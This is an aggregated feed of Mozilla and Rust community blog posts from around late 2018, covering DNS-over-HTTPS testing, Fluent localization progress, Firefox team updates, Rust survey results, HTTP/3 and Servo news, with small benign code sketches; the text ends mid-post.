In a world where the United States v. Microsoft Corporation (2001) antitrust lawsuit didn't happen, would the iPhone have been as successful? In 1999 I was so concerned about the potential domination of Microsoft over the World Wide Web that I started making volunteer contributions to (what became) Firefox (which drew me into working for Mozilla until 2016). At that time Microsoft was crushing Netscape with superior engineering, lowering the price of the browser to zero, bundling IE with Windows and other hardball tactics that had conquered all previous would-be Microsoft competitors. With total domination of the browser market, Microsoft would be able to take control of Web standards and lead Web developers to rely on Microsoft-only features like ActiveX (or later Avalon/WPF), making it practically impossible for anyone but Microsoft to create a browser that could view the bulk of the Web. Web browsing was an important feature for the first release of the iPhone in 2007; indeed for the first year, before the App Store launched, it was the only way to do anything on the phone other than use the built-in apps. We'll never know how successful the iPhone would have been without a viable Web browser, but it might have changed the competitive landscape significantly. Thankfully Mozilla managed to turn the tide to prevent Microsoft's total browser domination. As a participant in that battle, I'm convinced that the 2001 antitrust lawsuit played a big part in restraining Microsoft's worst behavior, creating space (along with Microsoft blunders) for Firefox to compete successfully during a narrow window of opportunity when creating a viable alternative browser was still possible. (It's also interesting to consider what Microsoft could have done to Google with complete browser domination and no antitrust concerns.)

We can't be sure what the no-antitrust world would have been like, but those who argue that Apple/Microsoft shows antitrust action was not needed bear the burden of showing that their counterfactual world is compelling.

Mozilla Future Releases BlogNext Steps in DNS-over-HTTPS Testing

Over the past few months, Mozilla has experimented with DNS-over-HTTPS (DoH). The intention is to fix a part of the DNS ecosystem that simply isn’t up to the modern, secure standards that every Internet user should expect. Today, we want to let you know about our next test of the feature.

Our initial tests of DoH studied the time it takes to get a response from Cloudflare’s DoH resolver. The results were very positive – the slowest users show a huge performance improvement. A recent test in our Beta channel confirmed that DoH is fast and isn’t causing problems for our users. However, those tests only measure the DNS operation itself, which isn’t the whole story.

Content Delivery Networks (CDNs) provide localized DNS responses depending on where you are in the network, with the goal being to send you to a host which is near you on the network and therefore will give you the best performance. However, because of the way that Cloudflare resolves names [technical note: it’s a centralized resolver without EDNS Client Subnet], this process works less well when you are using DoH with Firefox.

The result is that the user might get less well-localized results that could result in a slow user experience even if the resolver itself is accurate and fast.

This is something we can test. We are going to study the total time it takes to get a response from the resolver and fetch a web page. To do that, we’re working with Akamai to help us understand more about the performance impact. Firefox users enrolled in the study will automatically fetch data once a day from four test web pages hosted by Akamai, collect information about how long it took to look up DNS and then send that performance information to Firefox engineers for analysis. These test pages aren’t ones the user would normally visit, and they just contain dummy content.

A soft rollout to a small portion of users in our Release channel in the United States will begin this week and end next week. As before, this study will use Cloudflare’s DNS-over-HTTPS service and will continue to provide in-browser notifications about the experiment so that everyone is fully informed and has a chance to decline participation in this particular experiment. Moving forward, we are working to build a larger ecosystem of trusted DoH providers, and we hope to be able to experiment with other providers soon.

We don’t yet have a date for the full release of this feature. We will give you a readout of the result of this test and will let you know our future plans at that time. So stay tuned.

The post Next Steps in DNS-over-HTTPS Testing appeared first on Future Releases.

Zibi BranieckiMultilingual Gecko Status Update 2018.2

Welcome to the third edition of Multilingual Gecko Status Update!

In the previous update we covered the work which landed in Firefox 59 and Firefox 60.

At the time, we’ve been finalizing the platform work to support Fluent localization system, and we were in the middle of migration of the first Firefox UI component – Preferences – to it.

Today, we’ll pick up right where we left off!

Firefox 61 (June)

Firefox 61 fits into the trend of things calming down in Intl – and that’s great news! It means that we are reaching platform maturity after all the groundbreaking refactors in 2017, and we can all focus on the work on top of the modules, rather than playing whack-a-mole fixing bugs and adding missing features.

The biggest platform changes are really just an update to ICU 61, which Andre landed in March, and my work on adding mozIntl.RelativeTimeFormat and mozIntl.getLocaleDisplayNames.

The former gave us a stable unified API for presenting relative time (such as “In 5 minutes” or “10 days ago”) while the latter unified how we present language, region and combinations of those in our user interface based on the Unicode CLDR representation (example: “English (United States)”).

As I explained in my earlier posts, one of the things I’m particularly proud of is that we go the extra mile to use every such opportunity to not only fix the immediate Firefox UI need, but also push such proposals for standardization and, as a result, make the Web Platform more complete.

In this case, Intl.RelativeTimeFormat has been proposed and, thanks to amazing work by Daniel Ehrenberg, is now in Stage 3 and soon will be exposed to all web developers in all browsers! Intl.getLocaleDisplayNames is less mature but the work on it just picked up.
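
For a feel of what the proposed web-facing API looks like, here is a quick sketch using the standard Intl.RelativeTimeFormat shape (the chrome-side mozIntl variant is similar in spirit, though its exact surface may differ):

// Standard Intl.RelativeTimeFormat as proposed for the web platform.
const rtf = new Intl.RelativeTimeFormat("en", { numeric: "auto" });
console.log(rtf.format(5, "minute"));  // "in 5 minutes"
console.log(rtf.format(-10, "day"));   // "10 days ago"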

Firefox migration to Fluent reached its next milestone moving from just a couple messages to over 100 Fluent messages in Firefox!

Notable changes [my work] [intl module]:

Firefox 62 (September)

Another calm cycle! The biggest feature was the introduction of the pseudolocalization in Firefox which I blogged about, and landing of the developer documentation.

The documentation has been insanely useful in distributing knowledge and helping engineers feel more comfortable working with the new stack, and I’m very happy we reached a stage where landing documentation is the big news 🙂

In Fluent land we spent the March-May timeframe moving from 100 messages to 500 Fluent messages in Firefox!

Notable changes [my work] [intl module]:

Firefox 63 (October)

This cycle was quite similar to the previous one, with the bulk of the work going into regular maintenance and cleanups.

For my work, the trend is to start integrating Fluent deeper into Gecko with more work around L10nRegistry v1 limitations and getting deeper DOM integration to improve XUL performance.

In this cycle I landed an XPCOM mozIDOMLocalization API, which allows us to call Fluent from C++ and was required for a bigger change that we landed in Firefox 64.

One new theme is Kris Maglione, who started working on reducing the performance and memory overhead coming from the old StringBundle API (used for .properties). With all the new work centralized around Fluent, but with a large portion of our strings still using StringBundle, it becomes a great target for optimizations: cutting out everything we don’t use and, as we now know, never will.

Notable changes [my work] [intl module]:

Firefox 64 (December)

This release is still getting stabilized and will be released in December, but the work cycle on it happened between September and October, so I can already provide you an account of that work!

Besides a regular stack of cleanups coming from Henri and me, we’ve seen Ehsan Akhgari taking over from Kris to remove more lines of unused code.

The really big change was the introduction of DocumentL10n API which is a C++ API with its own WebIDL tightly integrated into the very core of DOM module in Gecko – nsIDocument.

Before that, Fluent lived in Gecko as some form of glorified JavaScript library. While it is Fluent’s goal to target the web platform, the Firefox UI is inherently different from web content and benefits from better integration between the DOM and its localization component.

This change allowed us to better integrate localization into the document’s life cycle, but what’s even more important, it allowed us to expose Fluent to documents that usually do not have special privileges and could not access Fluent before.

As for migration, we moved along nicely, bumping from 500 to around 800 messages thanks to the hard work of a number of students mentored by Jared Wein and Gijs Kruitbosch. The students picked up work on the migration as their Capstone project.

Notable changes [my work] [intl module]:

Summary

2018 has been much “easier” for the intl module than 2017 was. It’s great to see how all the pieces fit together, and for me personally, it enabled me to focus on getting Fluent better integrated into Gecko.

There’s still a lot of work, but it is now fully focused on Fluent and localization, while our intl module as a whole goes through a well-earned peaceful period.

Between now and the next status update, I hope to publish a summary post about the last two years of work. Stay tuned!

The Mozilla BlogState of Mozilla 2017: Annual Report

The State of Mozilla annual report for 2017 is now available here.

The new report outlines how Mozilla operates, provides key information on the ways in which we’ve made an impact, and includes details from our financial reports for 2017. The State of Mozilla report release is timed to coincide with when we submit the Mozilla non-profit tax filing for the previous calendar year.

Mozilla is unique. We were founded nearly 20 years ago with the mission to ensure the internet is a global public resource that is open and accessible to all. That mission is as important now as it has ever been.

The demand to keep the internet transparent and accessible to all, while preserving user control of their data, has always been an imperative for us and it’s increasingly become one for consumers. From internet health to digital rights to open source — the movement of people working on internet issues is growing — and Mozilla is at the forefront of the fight.

We measure our success not only by the adoption of our products, but also by our ability to increase the control people have in their online lives, our impact on the internet, our contribution to standards, and how we work to protect the overall health of the web.

As we look ahead, we know that leading the charge in changing the culture of the internet will mean doing more to develop the direct relationships that will make the Firefox and Mozilla experiences fully responsive to the needs of consumers today.

We’re glad we are not in this alone. None of the work we do or the impact we have would be possible without the dedication of our global community of contributors and loyal Firefox users. We are incredibly grateful for the support and we will continue to fight for the open internet.

We encourage you to get involved in helping protect the future of the internet: join Mozilla.

The post State of Mozilla 2017: Annual Report appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 50

Highlights

Friends of the Firefox team

Introductions

  • Gijs introduces Patricia Lawless (:plawless)! Welcome!

Resolved bugs (excluding employees)

Project Updates

Activity Stream

  • CFR experiment (addon recommendation) in 63
  • Prefed on (in nightly) the new implementation of snippets on about:home and about:newtab
    • Same looks but removed security risks
  • Using attribution parameters to show different onboarding messages to user based on how they installed Firefox

Application Services (Sync / Firefox Accounts / Push)

  • A lot of exciting work happening on mobile. 🦊📱
    • Mark has history sync working between the Android Components reference browser and Desktop! 🕒
      • Showing the Firefox Sync settings in the Android Components reference browser

        Hooray for code re-usability!

    • Mark also wired up our Rust Places library to provide autocomplete suggestions for the Android Components AwesomeBar. 📇
    • Edouard and Ryan wired up the Android Components reference browser to the new client instance metadata API. This will power device names, as well as the new, faster “send tab to device”. ✉️
    • Thom is continuing to improve our FFI layer, which lets our Android projects (and iOS, and, some day, Desktop!) consume our Rust syncing and storage libraries. 🛠
    • Thom and Nick have also been working on shipping composite builds, with all the Application Services Rust components in a single library. 📦
    • JR is sketching out an API for a Rust Push component, which we’ll use on mobile first, and eventually replace the push client on Desktop. 📣
    • Lina added history collection to GeckoView and the GeckoView engine in Android Components, and some fixes for new bookmark sync. 📚
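
To make the FFI bullet above a bit more concrete: the general pattern is to keep the shared logic in plain Rust and expose a small C ABI that the Kotlin and Swift bindings call into. The snippet below is only a minimal sketch of that pattern with made-up names (places_autocomplete, places_string_free), not the actual application-services code.

    use std::ffi::{CStr, CString};
    use std::os::raw::c_char;

    // Core logic lives in ordinary Rust and is shared by every platform.
    fn autocomplete(query: &str) -> String {
        format!("suggestions for '{}'", query)
    }

    // C-ABI entry point that a Kotlin (JNA/JNI) or Swift binding can call.
    // The function name is hypothetical, purely for illustration.
    #[no_mangle]
    pub extern "C" fn places_autocomplete(query: *const c_char) -> *mut c_char {
        // Safety: the caller must pass a valid, NUL-terminated string.
        let query = unsafe { CStr::from_ptr(query) }.to_string_lossy();
        CString::new(autocomplete(&query)).unwrap().into_raw()
    }

    // Strings allocated by Rust must be handed back to Rust to be freed.
    #[no_mangle]
    pub extern "C" fn places_string_free(s: *mut c_char) {
        if !s.is_null() {
            unsafe { drop(CString::from_raw(s)) };
        }
    }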

Fission

Fluent

Mobile

Android Components
  • Last week we released version 0.31.0 of Android Components, and this week version 0.32.0. Some highlights of those releases:
    • NestedGeckoView / NestedWebView implementations to synchronize scrolling with a toolbar or other views (e.g. hiding the toolbar when the web content is scrolled).
    • A new component called concept-fetch that provides an abstract definition of an HTTP client for fetching resources. In 0.32.0 we landed two implementations of this concept, based on HttpURLConnection and OkHttp (a GeckoView/Necko implementation will follow soon). Eventually all HTTP client code in the components will go through concept-fetch, and consumers can decide which HTTP client implementation the components should use in an app (see the sketch after this list).
    • Permission requests from content (e.g. camera, location, protected media playback) can now be observed and processed via the browser session component.
    • A rewritten, configurable session storage for persisting the session state to disk.
  • In addition to that we landed a lot of improvements in our Reference Browser (Nightly builds available here):
    • Integrated crash reporting using lib-crash component.
    • Added awesome bar using browser-awesomebar component.
    • The toolbar now hides automatically when scrolling web content.
    • Added the browser-storage-sync component, which will soon be used for saving and syncing browser history.
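
The concept-fetch component itself is written in Kotlin; purely to illustrate the shape of the abstraction described in the list above, here is a minimal sketch of the same idea in Rust with hypothetical types (an HttpClient trait standing in for the concept, and a stub implementation standing in for HttpURLConnection, OkHttp or Necko):

    // Components depend on the abstract client; the app picks the implementation.
    struct Request { url: String }
    struct Response { status: u16, body: Vec<u8> }

    trait HttpClient {
        fn fetch(&self, request: &Request) -> Result<Response, String>;
    }

    // A stub implementation, standing in for HttpURLConnection, OkHttp or Necko.
    struct StubClient;

    impl HttpClient for StubClient {
        fn fetch(&self, request: &Request) -> Result<Response, String> {
            Ok(Response { status: 200, body: request.url.clone().into_bytes() })
        }
    }

    // A component only ever sees the abstraction, never the concrete client.
    fn load_icon(client: &dyn HttpClient, url: &str) -> Result<Vec<u8>, String> {
        client.fetch(&Request { url: url.to_string() }).map(|response| response.body)
    }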

Performance

  • dthayer
    • Work on document splitting is ongoing. This will eventually allow us to output separate documents to separate framebuffers that we can hand to the OS compositor, so we don't have to repaint the whole window every time something in the chrome changes or animates.
    • Doing some scaffolding work to support having async work inside PromiseWorkers.
  • Felipe
    • Tab animation work is ongoing
    • Try builds generated and waiting for feedback from UX
    • Cleaning up patches to start feedback/early-review cycles
  • Florian
    • QA is testing the new about:performance features.
    • Fixing more bugs (rtl, minor layout issues, etc.)
    • Working on a tool to explore BHR (background hang reporter) data – feedback welcome!
  • Gijs
    • Continuing to experiment with lowering vsync frame rate on low-end devices to improve performance there.
    • Landed a fix to make the initial tab remote immediately, to avoid loading about:blank in the parent first. Continuing work on reducing about:blank-loading overhead.
    • Chasing a Linux-only leak regression in our printing tests that seems to have to do with the focus manager holding on to a content window indefinitely.
  • mconley

Policy Engine

  • Uplifted policies to Beta and ESR for:
    • Certificates
    • Locale switching
    • Startup choices (restore session, new tab page, etc.)
    • Updating Extensions
  • Platform-level macOS support also uplifted for beta/ESR
  • Removed the concept of GPO machine-only policies, which simplifies usage and documentation

Search and Navigation

Search Shortcuts Improvements
Quantum Bar
Places

Web Payments

Mozilla Privacy BlogBrussels Mozilla Mornings: Critically assessing the EU Terrorist Content regulation

On the morning of 12 December, Mozilla will host the first of our Brussels Mozilla Mornings series – regular breakfast meetings where we bring together policy experts, policy-makers and practitioners for insight and discussion on the latest EU digital policy developments. This first session will focus on the recently proposed EU Terrorist Content regulation.

The panel discussion will seek to unpack the Commission’s legislative proposal – what it means for the internet, users’ rights, and the fight against terrorism. The discussions will be substantive in nature, and will deal with some of the most contentious issues in the proposal, including the 60 minute takedown procedure and upload filtering obligations.

Speakers

Fanny Hidvégi, Access Now
Joris van Hoboken, Free University of Brussels
Owen Bennett, Mozilla

Moderated by Jen Baker

Logistical details

08:30-10:00
Wednesday 12 December
Radisson RED hotel, rue d’Idalie 35, Brussels

Register your attendance here.

The post Brussels Mozilla Mornings: Critically assessing the EU Terrorist Content regulation appeared first on Open Policy & Advocacy.

QMOFirefox 64 Beta 12 Testday Results

Hello Mozillians!

As you may already know, last Friday, November 23rd, we held a new Testday event for Firefox 64 Beta 12.

Thank you all for helping us make Mozilla a better place: Gabriela, Kamila kamciatek, Amirtha V and Priyadharshini A.

Results:

– several test cases executed for the Multi-select tabs and Widevine CDM features. During this session, 3 new issues were reported!
– bugs verified: 1495081148837 and 1483591

Thanks for another successful testday! 🙂

This Week In RustThis Week in Rust 262

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is modulator, a crate of abstract modulators for use in audio synthesizers (and possibly elsewhere). Thanks to Andrea Pessino for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

173 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Africa
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

"I did not want to inflict memory management on my son" – @M_a_s_s_i

– Massimiliano Mantione during his RustFest talk

Thanks to llogiq for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

The Rust Programming Language BlogRust Survey 2018 Results

Another year means another Rust survey, and this year marks Rust's third annual survey. This year, the survey launched for the first time in multiple languages: in total, 14 languages in addition to English were covered. The results from non-English languages totalled 25% of all responses and helped push the total to a new record of 5991 responses. Before we begin the analysis, we just want to give a big "thank you!" to all the people who took the time to respond and give us your thoughts. It’s because of your help that Rust will continue to improve year after year.

Do you use Rust

Despite having an increase in the number of responses, this year also saw an increase in the percentage of Rust users. Up from last year’s 66.9% Rust users, this year nearly three-quarters of responses were from Rust users.

Rust Users

Time with Rust

How long have you worked in Rust

We’re seeing a steady stream of new users into Rust. At the time of the survey, ~23% of Rust users had been using it for 3 months or less. Likewise, nearly a quarter of the users have used Rust for at least 2 years.

How long did it take to be productive

Over 40% of Rust users felt productive in Rust in less than a month of use, and over 70% felt productive in their first year. Unfortunately, there is a noticeable struggle among users, as over 22% do not yet feel productive.

How long have you been unproductive

Looking closer at these users who feel unproductive in Rust, only about 25% are in their first month of use. The challenge here is to find ways to help bridge users to productivity so they don't get stuck.

How much do you use Rust?

Size of summed Rust projects

Rust projects are continuing to trend to larger sizes, with larger overall investments. Medium to large investments in Rust (those totalling over 10k and 100k lines of code respectively) have grown from 8.9% in 2016, to 16% in 2017, to 23% this year.

How often do you use Rust

We’ve also seen growth in regular Rust usage. Up from 17.5% last year, daily Rust usage now covers nearly a quarter of users. In total, weekly Rust usage has risen from 60.8% to 66.4%.

Rust expertise

How would you rate your Rust expertise

Rather than being a simple curve, Rust expertise has two peaks: one around a "3", and another at "7", showing that users tend to see themselves as just above beginner or experienced without necessarily being expert.

How difficult are Rust concepts

Rust users generally felt that Enums and Cargo were largely easy concepts, followed by Iterators, Modules, and Traits. The more challenging concepts of Trait Bounds and Unsafe came next. Lastly, the most challenging concepts were Macros, Ownership & Borrowing, and Lifetimes. These challenges closely match feedback we’ve heard in years past and continue to be a focus of productivity improvements like NLL and the ongoing macro system work.

What programming languages are you familiar with

Humorously, we see that Rust isn't actually the top programming language that users were familiar with. Instead, it came in 2nd place behind Python.

Rust toolchain

Which Rust version do you use

We’re seeing similar numbers in users of the current stable release since last year. Perhaps surprisingly, we’re continuing to see a rise in the number of users who use the Nightly compiler in their workflow. For the second year in a row, Nightly usage has continued to rise, and is now over 56% (up from 51.6% of last year).

When asked why they used nightly, people responded with a broad range of reasons including: access to 2018 edition, asm, async/await, clippy, embedded development, rocket, NLL, proc macros, and wasm.

Has upgrading the compiler broken your code

The percentage of people who see a breakage during a routine compiler update has stayed the same since last year, with 7.4% saying they’ve experienced breakage.

If so how much work to fix it

Breakages generally leaned to requiring minor fixes, though some reported having moderate or major fixes to upgrade to the next stable compiler.

Preferred install method

We again see a strong showing for rustup, which continues to hold at 90% of Rust installs. Linux distros follow as a distant second at 17%.

Experience with Rust tools

Tools like rustfmt and rustdoc had a strong showing, with lots of positive support. Following these is the clippy tool -- despite having fewer users, its users enjoy the tool. The IDE support tools Rust Language Server and racer had positive support but unfortunately, of the tools surveyed, generated a few more dislike votes and comments. The bindgen tool has a relatively small userbase.

Rust workflow

Which platform are you developing on

Linux continues to be a powerhouse among Rust developers, holding on to roughly 80% of Rust developers. Windows usage has grown slightly from 31% last year to 34% this year, its second year in a row of growth.

Which platforms are you developing for

Linux and Windows continued to show strongly as targets for Rust applications. Other platforms held largely the same as last year, with one exception: WebAssembly. The new technology has showed impressive growth, nearly doubling from last year's 13% to this year's 24%.

What editors do you use

Vim, the front-runner among editors for the past two years, has now finally been bested by VSCode, which grew from 33.8% of Rust developers to 44.4% this year.

Rust at work

Do you use Rust at work

Rust continues its slow-and-steady growth in the workplace. We're now seeing year-over-year growth of full-time and part-time Rust, growing from last year's 4.4% full-time and 16.6% part-time to this year's 8.9% full-time and 21.2% part-time, a doubling of full-time commercial Rust use. In total, commercial Rust use grew from 21% to just over 30% of Rust users.

Is your company evaluating Rust

There is more room for Rust to grow into more companies: over a third of users report that their company isn't currently looking into evaluating Rust in the coming year. When paired with the survey data showing that nearly half of non-users needed company support, this points to the need for further company outreach or more company-focused information about Rust.

Feeling welcome

Do you feel welcome in the Rust community

An important part of the Rust community's efforts is ensuring that the Rust project is a welcoming place for its users. New users should feel encouraged to explore, share ideas, and generally be themselves.

When asked, both current Rust users and non-users largely felt welcome, though over a quarter of responses weren't sure. There was also some regional variation in these responses. For example, responses on the Russian version of the survey showed double the percent of unwelcome feelings at 4%. Mainland China showed even more at 8%.

There's a challenge here to help Rust communities worldwide feel like they are part of what makes Rust unique, as Rust continues to grow a strong presence in more areas of the world.

Are you underrepresented in tech

The number of people in Rust who self-identify as being part of a group underrepresented in technology is growing slowly year-over-year. The survey also highlights some challenges, as the number of women is still lower than the industry average of women in programming fields.

Rust Non-Users

A big part of a welcoming Rust community is reaching out to non-users as well. As we have in years past, we again asked the reasons why people weren't using Rust.

How long before you stopped

Of those who stopped using Rust, just over 50% stopped in less than a month; the remaining roughly 50% managed to use it for more than a month before stopping.

Why are you not using Rust

Many non-users responded that they did want to learn Rust, but there were factors that slowed them down. First among these is that the companies the respondents work for do not themselves use Rust. Nearly half of the non-users were blocked by the lack of company support.

Additionally, 1 in 4 non-users were slowed by the feeling of Rust being too intimidating or complicated. The work towards improving Rust IDE support has helped (down from 25% to 16%), though we still see a strong push towards even better IDE support among non-users.

Challenges

As we've done in past years, we asked for your comments in where Rust can improve. This year, we see some familiar themes as well as some new ones in this feedback. The top ten themes this year are:

  1. the need for better library support
  2. a better IDE experience
  3. the need for broader adoption of Rust generally
  4. a richer ecosystem of tools and support
  5. an improved learning curve
  6. the need for important language features and crates to be stable and supported
  7. support for async programming
  8. support for GUI development
  9. better documentation
  10. improved compile times

New this year is the rising need to support GUI development, showing that Rust continues to grow not only on the server, but that people are feeling the need to stretch into application development.

"Improve Rust marketing. Many people don't know about it"

Comments remind us that while Rust may be well-known in some circles, it still has room to grow and in many tech circles Rust may not yet be well-known.

"Keeping a focus on adoption/tutorials/books/novice experience will pay dividends in the years to come."

In addition to outreach, a broader set of documentation would in turn help reach a broader audience.

"Stability and maturity of developer tools, make it easier to get a working setup and to debug applications"

Many people commented on the IDE support, pointing out not only instability or inaccuracy in the RLS, but also the need for a much stronger IDE story that covered more areas, like easier debugging.

"The maturity of the ecosystem and libraries. Have a good ecosystem of "standard" libraries is key for the future of the language"

A common theme continues to be the need to push libraries to completion and grow the set of "standard" libraries that users can use. Some comments point out this isn't the fault of maintainers, who are already working hard to write and publish the crates, but that generally more companies need to get involved and offer commercial support.

"Ergonomics and discoverability of "putting it together" documentation"

Some people pointed out that ergonomics goes hand in hand with richer documentation, seeing that these aren't separate concepts but rather challenges that should be tackled together in a unified approach.

Looking forward

This year saw the strongest survey yet. Not only was it the largest community survey, it was the first to cover languages outside of English. Rust continues to grow steadily, and with it, both its strengths and challenges are introduced to a broader audience.

We look forward to using your feedback in planning for 2019, and we're excited to see where we can take Rust next.

William LachanceMaking contribution work for Firefox tooling and data projects

One of my favorite parts about Mozilla is mentoring and working alongside third party contributors. Somewhat surprisingly since I work on internal tools, I’ve had a fair amount of luck finding people to help work on projects within my purview: mozregression, perfherder, metrics graphics, and others have all benefited from the contributions of people outside of Mozilla.

In most cases (a notable exception being metrics graphics), these have been internal-tooling projects used by others to debug, develop, or otherwise understand the behaviour of Firefox. On the face of it, none of the things I work on are exactly “high profile cutting edge stuff” in the way, say, Firefox or the Rust Programming Language are. So why do they bother? The exact formula varies depending on contributor, but I think it usually comes down to some combination of these two things:

  1. A desire to learn and demonstrate competence with industry standard tooling (the python programming language, frontend web development, backend databases, “big data” technologies like Parquet, …).
  2. A desire to work with and gain recognition inside of a community of like-minded people.

Pretty basic, obvious stuff — there is an appeal here to basic human desires like the need for security and a sense of belonging. Once someone’s “in the loop”, so to speak, generally things take care of themselves. The real challenge, I’ve found, is getting people from the “I am potentially interested in doing something with Mozilla internal tools” stage to the point where they are confident and competent enough to work in a reasonably self-directed way. When I was on the A-Team, we classified this transition in terms of a commitment curve:

prototype commitment curve graphic by Steven Brown

The hardest part, in my experience, is the initial part of that curve. At this point, people are just dipping their toe in the water. Some may not have a ton of experience with software development yet. In other cases, my projects may just not be the right fit for them. But of course, sometimes there is a fit, or at least one could be developed! What I’ve found most helpful is “clearing a viable path” forward for the right kind of contributor. That is, some kind of initial hypothesis of what a successful contribution experience would look like as a new person transitions from “explorer” stage in the chart above to “associate”.

I don’t exactly have a perfect template for what “clearing a path” looks like in every case. It depends quite a bit on the nature of the contributor. But there are some common themes that I’ve found effective:

First, provide good, concise documentation both on the project’s purpose and vision and how to get started easily and keep it up to date. For projects with a front-end web component, I try to decouple the front end parts from the backend services so that people can yarn install && yarn start their way to success. Being able to see the project in action quickly (and not getting stuck on some mundane getting started step) is key in maintaining initial interest.

Second, provide a set of good starter issues (sometimes called “good first bugs”) for people to work on. Generally these would be non-critical-path type issues that have straightforward instructions to resolve and fix. Again, the idea here is to give people a sense of quick progress and resolution, a “yes I can actually do this” sort of feeling. But be careful not to let a contributor get stuck here! These bugs take a disproportionate amount of effort to file and mentor compared to their actual value — the key is to progress the contributor to the next level once it’s clear they can handle the basics involved in solving such an issue (checking out the source code, applying a fix, submitting a patch, etc). Otherwise you’re going to feel frustrated and wonder why you’re on an endless treadmill of writing up trivial bugs.

Third, once a contributor has established themselves by fixing a few of these simple issues, I try to get to know them a little better. Send them an email, learn where they’re from, invite them to chat on the project channel if they can. At the same time, this is an opportunity to craft a somewhat larger piece of work (a sort of mini-project) that they can do, tailored to their interests. For example, a new contributor on the Mission Control project has recently been working on adding Jest tests to the project — I provided some basic guidance of things to look at, but did not dictate exactly how to perform the task. They figured that out for themselves.

As time goes by, you just continue this process. Depending on the contributor, they may start coming up with their own ideas for how a project might be improved or they might still want to follow your lead (or that of the team), but at the least I generally see an improvement in their self-directedness and confidence after a period of sustained contribution. In either case, the key to success remains the same: sustained and positive communication and sharing of goals and aspirations, making sure that both parties are getting something positive out of the experience. Where possible, I try to include contributors in team meetings. Where there’s an especially close working relationship (e.g. Google Summer of Code), I try to set up a weekly one-on-one. Regardless, I make reviewing code, answering questions, and providing suggestions on how to move forward a top priority (i.e. not something I’ll leave for a few days). It’s the least I can do if someone is willing to take time out to contribute to my project.

If this seems similar to the best practices for how members of a team should onboard each other and work together, that’s not really a coincidence. Obviously the relationship is a little different because we’re not operating with a formal managerial structure and usually the work is unpaid: I try to bear that in mind and make double sure that contributors are really getting some useful skills and habits that they can take with them to future jobs and other opportunities, while also emphasizing that their code contributions are their own, not Mozilla’s. So far it seems to have worked out pretty well for all concerned (me, Mozilla, and the contributors).

Daniel StenbergHTTP/3 Explained

I’m happy to tell that the booklet HTTP/3 Explained is now ready for the world. It is entirely free and open and is available in several different formats to fit your reading habits. (It is not available on dead trees.)

The book describes what HTTP/3 and its underlying transport protocol QUIC are, why they exist, what features they have and how they work. The book is meant to be readable and understandable for most people with a rudimentary level of network knowledge or better.

These protocols are not done yet; there aren’t even any implementations of them in the main browsers yet! The book will be updated and extended along the way as things change, implementations mature and the protocols settle.

If you find bugs, mistakes, something that needs to be explained better/deeper or otherwise want to help out with the contents, file a bug!

It was just a short while ago I mentioned the decision to change the name of the protocol to HTTP/3. That triggered me to refresh my document in progress and there are now over 8,000 words there to help.

The entire HTTP/3 Explained contents are available on github.

If you haven’t caught up with HTTP/2 quite yet, don’t worry. We have you covered for that as well, with the http2 explained book.

Daniel PocockUN Forum on Business and Human Rights

This week I'm at the UN Forum on Business and Human Rights in Geneva.

What is the level of influence that businesses exert in the free software community? Do we need to be more transparent about it? Does it pose a risk to our volunteers and contributors?

The Servo BlogThis Week In Servo 119

In the past 3 weeks, we merged 243 PRs in the Servo organization’s repositories.

Planning and Status

Our roadmap is available online, including the overall plans for 2018.

This week’s status updates are here.

Notable Additions

  • avadacatavra created the infrastructure for implementing the Resource Timing and Navigation Timing web standards.
  • mandreyel added support for tracking focused documents in unique top-level browsing contexts.
  • SimonSapin updated many crates to the Rust 2018 edition.
  • ajeffrey improved the Magic Leap port in several ways.
  • nox implemented some missing WebGL extensions.
  • eijebong fixed a bug with fetching large HTTP responses.
  • cybai added support for firing the rejectionhandled DOM event.
  • Avanthikaa and others implemented additional oscillator node types.
  • jdm made scrolling work more naturally on backgrounds of scrollable content.
  • SimonSapin added support for macOS builds to the Taskcluster CI setup.
  • paulrouget made rust-mozjs support long-term reuse without reinitializing the library.
  • paulrouget fixed a build issue breaking WebVR support on android devices.
  • nox cleaned up a lot of texture-related WebGL code.
  • ajeffrey added a laser pointer in the Magic Leap port for interacting with web content.
  • pyfisch made webdriver composition events trigger corresponding DOM events.
  • nox reduced the amount of copying required when using HTML images for WebGL textures.
  • vn-ki implemented the missing JS constructor for HTML audio elements.
  • Manishearth added support for touch events on Android devices.
  • SimonSapin improved the treeherder output for the new Taskcluster CI.
  • jdm fixed a WebGL regression breaking non-three.js content on Android devices.
  • paulrouget made Servo shut down synchronously to avoid crashes on Oculus devices.
  • Darkspirit regenerated several important files used for HSTS and network requests.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Mozilla Open Innovation TeamOverscripted Web: a Mozilla Data Analysis Challenge

Help us explore the unseen JavaScript and what this means for the Web

Photo by Markus Spiske on Unsplash

What happens while you are browsing the Web? Mozilla wants to invite data and computer scientists, students and interested communities to join the “Overscripted Web: a Data Analysis Challenge”, and help explore JavaScript running in browsers and what this means for users. We gathered a rich dataset and we are looking for exciting new observations, patterns and research findings that help to better understand the Web. We want to bring the winners to speak at MozFest, our annual festival for the open Internet held in London.

The Dataset

